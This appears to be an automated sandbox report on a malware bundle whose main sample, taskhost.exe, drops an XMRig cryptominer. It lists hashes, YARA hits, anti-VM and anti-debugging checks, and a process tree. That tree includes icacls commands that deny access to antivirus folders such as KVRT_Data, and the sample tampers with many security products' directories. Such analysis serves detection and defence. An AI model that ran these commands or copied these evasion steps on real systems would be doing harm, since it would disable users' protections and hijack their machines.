Overview
overview
10Static
static
10sss/Install/Del3.bat
windows7-x64
1sss/Install/Del3.bat
windows10-2004-x64
1sss/Instal...te.bat
windows7-x64
1sss/Instal...te.bat
windows10-2004-x64
1sss/Install/del.bat
windows7-x64
1sss/Install/del.bat
windows10-2004-x64
1sss/Install/smss.exe
windows7-x64
10sss/Install/smss.exe
windows10-2004-x64
10sss/RDPWinst.exe
windows7-x64
1sss/RDPWinst.exe
windows10-2004-x64
1sss/ReaIte...st.exe
windows7-x64
10sss/ReaIte...st.exe
windows10-2004-x64
10sss/ReaIte...tw.exe
windows7-x64
9sss/ReaIte...tw.exe
windows10-2004-x64
9sss/Window...rv.exe
windows7-x64
10sss/Window...rv.exe
windows10-2004-x64
10sss/Window...MD.exe
windows7-x64
1sss/Window...MD.exe
windows10-2004-x64
1sss/Window...le.exe
windows7-x64
1sss/Window...le.exe
windows10-2004-x64
1sss/Window...st.exe
windows7-x64
1sss/Window...st.exe
windows10-2004-x64
1sss/Window...64.sys
windows7-x64
1sss/Window...64.sys
windows10-2004-x64
1sss/Window...dg.exe
windows7-x64
9sss/Window...dg.exe
windows10-2004-x64
9sss/Window...on.bat
windows7-x64
1sss/Window...on.bat
windows10-2004-x64
1Analysis
-
max time kernel
1050s -
max time network
1054s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
30-03-2024 23:04
Behavioral task
behavioral1
Sample
sss/Install/Del3.bat
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
sss/Install/Del3.bat
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
sss/Install/Delete.bat
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
sss/Install/Delete.bat
Resource
win10v2004-20240319-en
Behavioral task
behavioral5
Sample
sss/Install/del.bat
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
sss/Install/del.bat
Resource
win10v2004-20240226-en
Behavioral task
behavioral7
Sample
sss/Install/smss.exe
Resource
win7-20240221-en
Behavioral task
behavioral8
Sample
sss/Install/smss.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral9
Sample
sss/RDPWinst.exe
Resource
win7-20240221-en
Behavioral task
behavioral10
Sample
sss/RDPWinst.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral11
Sample
sss/ReaItekHD/taskhost.exe
Resource
win7-20240221-en
Behavioral task
behavioral12
Sample
sss/ReaItekHD/taskhost.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral13
Sample
sss/ReaItekHD/taskhostw.exe
Resource
win7-20231129-en
Behavioral task
behavioral14
Sample
sss/ReaItekHD/taskhostw.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral15
Sample
sss/Windows Tasks Service/winserv.exe
Resource
win7-20240215-en
Behavioral task
behavioral16
Sample
sss/Windows Tasks Service/winserv.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral17
Sample
sss/WindowsTask/AMD.exe
Resource
win7-20240221-en
Behavioral task
behavioral18
Sample
sss/WindowsTask/AMD.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral19
Sample
sss/WindowsTask/AppModule.exe
Resource
win7-20240221-en
Behavioral task
behavioral20
Sample
sss/WindowsTask/AppModule.exe
Resource
win10v2004-20240319-en
Behavioral task
behavioral21
Sample
sss/WindowsTask/MicrosoftHost.exe
Resource
win7-20240221-en
Behavioral task
behavioral22
Sample
sss/WindowsTask/MicrosoftHost.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral23
Sample
sss/WindowsTask/WinRing0x64.sys
Resource
win7-20240221-en
Behavioral task
behavioral24
Sample
sss/WindowsTask/WinRing0x64.sys
Resource
win10v2004-20240226-en
Behavioral task
behavioral25
Sample
sss/WindowsTask/audiodg.exe
Resource
win7-20231129-en
Behavioral task
behavioral26
Sample
sss/WindowsTask/audiodg.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral27
Sample
sss/WindowsTask/winlogon.bat
Resource
win7-20240221-en
Behavioral task
behavioral28
Sample
sss/WindowsTask/winlogon.bat
Resource
win10v2004-20240226-en
General
-
Target
sss/ReaItekHD/taskhost.exe
-
Size
21.7MB
-
MD5
b2ceb39a1dc0ed07e6e91ebc1131e6af
-
SHA1
bd5d9ca87727af82c0109d8fdd44fcd090a4302a
-
SHA256
7f29a1005a7c5c936791c1f9b2a6745286a01467fb15c94beaaf72ac959aee1e
-
SHA512
c8deb6c184e58fb27f2d760c8740af5a62c4182824e9b48607eb810fa95896c8bcdbf8d50c117f06a620b8f35c3eaa59a9376f8b8b9d27ca17a2b2f2047adb07
-
SSDEEP
393216:h/f16H6QzwnoD13bPmzcAWOzOutBzA6YG7E3VHEx8OdM8E4BQ4vqd0TEX:hV4SoD13bPmzcAWUA6rE3VHEx86MgKYQ
Malware Config
Signatures
-
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" taskhost.exe -
XMRig Miner payload 2 IoCs
resource yara_rule behavioral12/files/0x0007000000023248-30.dat family_xmrig behavioral12/files/0x0007000000023248-30.dat xmrig -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ taskhost.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ audiodg.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion taskhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion taskhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion audiodg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion audiodg.exe -
Executes dropped EXE 3 IoCs
pid Process 1276 Packs.exe 1884 audiodg.exe 1432 MicrosoftHost.exe -
Modifies file permissions 1 TTPs 64 IoCs
pid Process 4520 icacls.exe 2760 icacls.exe 1588 icacls.exe 2308 icacls.exe 2864 icacls.exe 5064 icacls.exe 4768 icacls.exe 2208 icacls.exe 4952 icacls.exe 528 icacls.exe 4296 icacls.exe 2720 icacls.exe 1420 icacls.exe 3792 icacls.exe 3960 icacls.exe 3500 icacls.exe 4592 icacls.exe 1132 icacls.exe 692 icacls.exe 4792 icacls.exe 384 icacls.exe 4320 icacls.exe 3760 icacls.exe 2760 icacls.exe 208 icacls.exe 2348 icacls.exe 2924 icacls.exe 4704 icacls.exe 4296 icacls.exe 1140 icacls.exe 3304 icacls.exe 5056 icacls.exe 988 icacls.exe 3816 icacls.exe 3476 icacls.exe 3488 icacls.exe 1508 icacls.exe 2660 icacls.exe 3960 icacls.exe 2608 icacls.exe 2672 icacls.exe 3812 icacls.exe 3816 icacls.exe 4412 icacls.exe 3720 icacls.exe 2632 icacls.exe 692 icacls.exe 2856 icacls.exe 3548 icacls.exe 1216 icacls.exe 2012 icacls.exe 1808 icacls.exe 4068 icacls.exe 1712 icacls.exe 4980 icacls.exe 4384 icacls.exe 3696 icacls.exe 4980 icacls.exe 3300 icacls.exe 1708 icacls.exe 3640 icacls.exe 1512 icacls.exe 3168 icacls.exe 2088 icacls.exe -
resource yara_rule behavioral12/memory/4708-0-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/4708-2-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/4708-3-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/4708-4-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/4708-5-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/4708-6-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/4708-7-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/4708-8-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/4708-9-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/4708-10-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/files/0x0008000000023247-31.dat themida behavioral12/memory/4708-33-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/4708-34-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/4708-36-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/4708-37-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/4708-38-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/4708-39-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/4708-40-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/1884-48-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/1884-50-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/1884-51-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/1884-52-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/1884-54-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/1884-55-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/1884-56-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/1884-58-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/1884-59-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/4708-63-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/1884-64-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/1884-65-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/4708-71-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/1884-72-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/4708-73-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/1884-74-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/4708-75-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/1884-76-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/4708-81-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/1884-82-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/4708-83-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/1884-84-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/4708-85-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/1884-86-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/4708-87-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/1884-88-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/4708-89-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/1884-90-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/4708-91-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/1884-92-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/4708-93-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/1884-94-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/4708-95-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/1884-96-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/1884-98-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/4708-97-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/4708-99-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/1884-100-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/1884-102-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/4708-101-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/4708-103-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/1884-104-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/4708-105-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/1884-106-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida behavioral12/memory/4708-107-0x00007FF614680000-0x00007FF6164C7000-memory.dmp themida behavioral12/memory/1884-108-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp themida -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA taskhost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA audiodg.exe -
AutoIT Executable 63 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral12/memory/4708-3-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/4708-4-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/4708-5-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/4708-6-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/4708-7-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/4708-8-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/4708-9-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/4708-10-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/4708-33-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/4708-34-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/4708-36-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/4708-37-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/4708-38-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/4708-39-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/4708-40-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/1884-51-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/1884-52-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/1884-54-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/1884-55-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/1884-56-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/1884-58-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/1884-59-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/4708-63-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/1884-64-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/1884-65-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/4708-71-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/1884-72-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/4708-73-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/1884-74-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/4708-75-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/1884-76-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/4708-81-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/1884-82-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/4708-83-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/1884-84-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/4708-85-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/1884-86-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/4708-87-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/1884-88-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/4708-89-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/1884-90-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/4708-91-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/1884-92-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/4708-93-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/1884-94-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/4708-95-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/1884-96-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/1884-98-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/4708-97-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/4708-99-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/1884-100-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/1884-102-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/4708-101-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/4708-103-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/1884-104-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/4708-105-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/1884-106-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/4708-107-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/1884-108-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/4708-109-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/1884-110-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe behavioral12/memory/4708-111-0x00007FF614680000-0x00007FF6164C7000-memory.dmp autoit_exe behavioral12/memory/1884-112-0x00007FF67E4F0000-0x00007FF67F684000-memory.dmp autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4708 taskhost.exe 1884 audiodg.exe -
Drops file in Program Files directory 38 IoCs
description ioc Process File opened for modification C:\Program Files\DrWeb taskhost.exe File opened for modification C:\Program Files\Common Files\McAfee taskhost.exe File opened for modification C:\Program Files\Loaris Trojan Remover taskhost.exe File opened for modification C:\Program Files (x86)\Transmission taskhost.exe File opened for modification C:\Program Files\Transmission taskhost.exe File opened for modification C:\Program Files\HitmanPro taskhost.exe File opened for modification C:\Program Files\Cezurity taskhost.exe File opened for modification C:\Program Files\Ravantivirus taskhost.exe File opened for modification C:\Program Files (x86)\Panda Security taskhost.exe File opened for modification C:\Program Files\Kaspersky Lab taskhost.exe File opened for modification C:\Program Files\Bitdefender Agent taskhost.exe File opened for modification C:\Program Files\Process Lasso taskhost.exe File opened for modification C:\Program Files\Common Files\Doctor Web taskhost.exe File opened for modification C:\Program Files (x86)\Cezurity taskhost.exe File opened for modification C:\Program Files\EnigmaSoft taskhost.exe File opened for modification C:\Program Files\SUPERAntiSpyware taskhost.exe File opened for modification C:\Program Files\AVAST Software taskhost.exe File opened for modification C:\Program Files (x86)\Kaspersky Lab taskhost.exe File opened for modification C:\Program Files (x86)\GRIZZLY Antivirus taskhost.exe File opened for modification C:\Program Files (x86)\IObit\IObit Malware Fighter taskhost.exe File opened for modification C:\Program Files (x86)\360 taskhost.exe File opened for modification C:\Program Files (x86)\AVAST Software taskhost.exe File opened for modification C:\Program Files\AVG taskhost.exe File opened for modification C:\Program Files (x86)\AVG taskhost.exe File opened for modification C:\Program Files (x86)\IObit\Advanced SystemCare taskhost.exe File opened for modification C:\Program Files\Process Hacker 2 taskhost.exe File opened for modification C:\Program Files (x86)\SpeedFan taskhost.exe File opened for modification C:\Program Files\Rainmeter taskhost.exe File opened for modification C:\Program Files (x86)\IObit taskhost.exe File opened for modification C:\Program Files\RogueKiller taskhost.exe File opened for modification C:\Program Files (x86)\SpyHunter taskhost.exe File opened for modification C:\Program Files\Malwarebytes taskhost.exe File opened for modification C:\Program Files\COMODO taskhost.exe File opened for modification C:\Program Files\Enigma Software Group taskhost.exe File opened for modification C:\Program Files\SpyHunter taskhost.exe File opened for modification C:\Program Files\Common Files\AV taskhost.exe File opened for modification C:\Program Files\ESET taskhost.exe File opened for modification C:\Program Files (x86)\Moo0 taskhost.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 audiodg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString audiodg.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 2316 ipconfig.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Local\Temp\sss\ReaItekHD\winmgmts:\localhost\root\CIMV2 taskhost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe 4708 taskhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4708 taskhost.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeLockMemoryPrivilege 1432 MicrosoftHost.exe Token: SeLockMemoryPrivilege 1432 MicrosoftHost.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1432 MicrosoftHost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4708 wrote to memory of 2844 4708 taskhost.exe 94 PID 4708 wrote to memory of 2844 4708 taskhost.exe 94 PID 2844 wrote to memory of 2316 2844 cmd.exe 132 PID 2844 wrote to memory of 2316 2844 cmd.exe 132 PID 4708 wrote to memory of 3320 4708 taskhost.exe 97 PID 4708 wrote to memory of 3320 4708 taskhost.exe 97 PID 3320 wrote to memory of 4424 3320 cmd.exe 99 PID 3320 wrote to memory of 4424 3320 cmd.exe 99 PID 4708 wrote to memory of 1276 4708 taskhost.exe 143 PID 4708 wrote to memory of 1276 4708 taskhost.exe 143 PID 4708 wrote to memory of 1276 4708 taskhost.exe 143 PID 4708 wrote to memory of 1640 4708 taskhost.exe 101 PID 4708 wrote to memory of 1640 4708 taskhost.exe 101 PID 4708 wrote to memory of 752 4708 taskhost.exe 103 PID 4708 wrote to memory of 752 4708 taskhost.exe 103 PID 752 wrote to memory of 1712 752 cmd.exe 208 PID 752 wrote to memory of 1712 752 cmd.exe 208 PID 4708 wrote to memory of 1136 4708 taskhost.exe 106 PID 4708 wrote to memory of 1136 4708 taskhost.exe 106 PID 4708 wrote to memory of 2764 4708 taskhost.exe 157 PID 4708 wrote to memory of 2764 4708 taskhost.exe 157 PID 2764 wrote to memory of 3548 2764 cmd.exe 110 PID 2764 wrote to memory of 3548 2764 cmd.exe 110 PID 4708 wrote to memory of 928 4708 taskhost.exe 111 PID 4708 wrote to memory of 928 4708 taskhost.exe 111 PID 4708 wrote to memory of 2644 4708 taskhost.exe 113 PID 4708 wrote to memory of 2644 4708 taskhost.exe 113 PID 2644 wrote to memory of 2348 2644 cmd.exe 115 PID 2644 wrote to memory of 2348 2644 cmd.exe 115 PID 4708 wrote to memory of 3568 4708 taskhost.exe 116 PID 4708 wrote to memory of 3568 4708 taskhost.exe 116 PID 3568 wrote to memory of 4520 3568 cmd.exe 118 PID 3568 wrote to memory of 4520 3568 cmd.exe 118 PID 4708 wrote to memory of 1592 4708 taskhost.exe 119 PID 4708 wrote to memory of 1592 4708 taskhost.exe 119 PID 1592 wrote to memory of 5056 1592 cmd.exe 169 PID 1592 wrote to memory of 5056 1592 cmd.exe 169 PID 4708 wrote to memory of 4264 4708 taskhost.exe 122 PID 4708 wrote to memory of 4264 4708 taskhost.exe 122 PID 4264 wrote to memory of 3604 4264 cmd.exe 124 PID 4264 wrote to memory of 3604 4264 cmd.exe 124 PID 4708 wrote to memory of 3168 4708 taskhost.exe 181 PID 4708 wrote to memory of 3168 4708 taskhost.exe 181 PID 3168 wrote to memory of 3192 3168 cmd.exe 127 PID 3168 wrote to memory of 3192 3168 cmd.exe 127 PID 4708 wrote to memory of 4500 4708 taskhost.exe 128 PID 4708 wrote to memory of 4500 4708 taskhost.exe 128 PID 4500 wrote to memory of 3960 4500 cmd.exe 185 PID 4500 wrote to memory of 3960 4500 cmd.exe 185 PID 4708 wrote to memory of 1180 4708 taskhost.exe 131 PID 4708 wrote to memory of 1180 4708 taskhost.exe 131 PID 1180 wrote to memory of 4412 1180 cmd.exe 133 PID 1180 wrote to memory of 4412 1180 cmd.exe 133 PID 4708 wrote to memory of 1040 4708 taskhost.exe 190 PID 4708 wrote to memory of 1040 4708 taskhost.exe 190 PID 1040 wrote to memory of 32 1040 cmd.exe 136 PID 1040 wrote to memory of 32 1040 cmd.exe 136 PID 4708 wrote to memory of 2088 4708 taskhost.exe 137 PID 4708 wrote to memory of 2088 4708 taskhost.exe 137 PID 2088 wrote to memory of 528 2088 cmd.exe 139 PID 2088 wrote to memory of 528 2088 cmd.exe 139 PID 4708 wrote to memory of 1632 4708 taskhost.exe 140 PID 4708 wrote to memory of 1632 4708 taskhost.exe 140 PID 1632 wrote to memory of 1132 1632 cmd.exe 142
Processes
-
C:\Users\Admin\AppData\Local\Temp\sss\ReaItekHD\taskhost.exe"C:\Users\Admin\AppData\Local\Temp\sss\ReaItekHD\taskhost.exe"1⤵
- Modifies visiblity of hidden/system files in Explorer
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:4708 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns2⤵
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Windows\system32\ipconfig.exeipconfig /flushdns3⤵
- Gathers network information
PID:2316
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force2⤵
- Suspicious use of WriteProcessMemory
PID:3320 -
C:\Windows\system32\gpupdate.exegpupdate /force3⤵PID:4424
-
-
-
C:\ProgramData\Setup\Packs.exeC:\ProgramData\Setup\Packs.exe -ppidar2⤵
- Executes dropped EXE
PID:1276
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT_Data" /deny "%username%":(OI)(CI)(F)2⤵PID:1640
-
-
